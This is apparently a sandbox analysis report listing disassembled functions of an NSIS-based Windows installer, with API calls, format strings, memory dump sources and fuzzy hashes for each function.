                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: Text$ItemTimerWindowwsprintf
                                      • String ID: verifying installer: %d%%
                                      • API String ID: 1451636040-82062127
                                      • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                      • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                      • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                      • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                      APIs
                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                      • GlobalFree.KERNEL32(00682528), ref: 00402387
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: FreeGloballstrcpyn
                                      • String ID: (%h$Exch: stack < %d elements$Pop: stack empty$SortsCestVoltageEfficiency
                                      • API String ID: 1459762280-1731988344
                                      • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                      • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                      • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                      • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                      APIs
                                      • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                      • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                      • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                      • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: Char$Next$Prev
                                      • String ID: *?|<>/":
                                      • API String ID: 589700163-165019052
                                      • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                      • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                      • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                      • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                      • RegCloseKey.ADVAPI32(?), ref: 00401504
                                      • RegCloseKey.ADVAPI32(?), ref: 00401529
                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: Close$DeleteEnumOpen
                                      • String ID:
                                      • API String ID: 1912718029-0
                                      • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                      • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                      • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                      • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                      APIs
                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                      • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                      • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                      • GlobalFree.KERNEL32(00682528), ref: 00402387
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                      • String ID:
                                      • API String ID: 3376005127-0
                                      • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                      • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                      • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                      • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                      • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                      • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                      • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                      • String ID:
                                      • API String ID: 2568930968-0
                                      • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                      • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                      • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                      • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                      APIs
                                      • GetDlgItem.USER32(?), ref: 004020A3
                                      • GetClientRect.USER32(00000000,?), ref: 004020B0
                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                      • DeleteObject.GDI32(00000000), ref: 004020EE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                      • String ID:
                                      • API String ID: 1849352358-0
                                      • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                      • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                      • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                      • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                      APIs
                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: MessageSend$Timeout
                                      • String ID: !
                                      • API String ID: 1777923405-2657877971
                                      • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                      • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                      • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                      • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                      APIs
                                      • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                      • wsprintfW.USER32 ref: 00404483
                                      • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: ItemTextlstrlenwsprintf
                                      • String ID: %u.%u%s%s
                                      • API String ID: 3540041739-3551169577
                                      • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                      • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                      • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                      • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                      APIs
                                        • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                      Strings
                                      • DeleteRegKey: "%s\%s", xrefs: 00402843
                                      • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                      • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                      • API String ID: 1697273262-1764544995
                                      • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                      • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                      • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                      • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                      APIs
                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                        • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                      • lstrlenW.KERNEL32 ref: 004026B4
                                      • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                      • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                      • String ID: CopyFiles "%s"->"%s"
                                      • API String ID: 2577523808-3778932970
                                      • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                      • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                      • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                      • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: lstrcatwsprintf
                                      • String ID: %02x%c$...
                                      • API String ID: 3065427908-1057055748
                                      • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                      • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                      • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                      • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                      APIs
                                      • GetDC.USER32(?), ref: 00402100
                                      • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,74DF23A0,00000000), ref: 00406902
                                      • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                      • String ID:
                                      • API String ID: 1599320355-0
                                      • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                      • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                      • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                      • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                      APIs
                                        • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                      • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                      • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                      • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: lstrcpyn$CreateFilelstrcmp
                                      • String ID: Version
                                      • API String ID: 512980652-315105994
                                      • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                      • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                      • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                      • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                      APIs
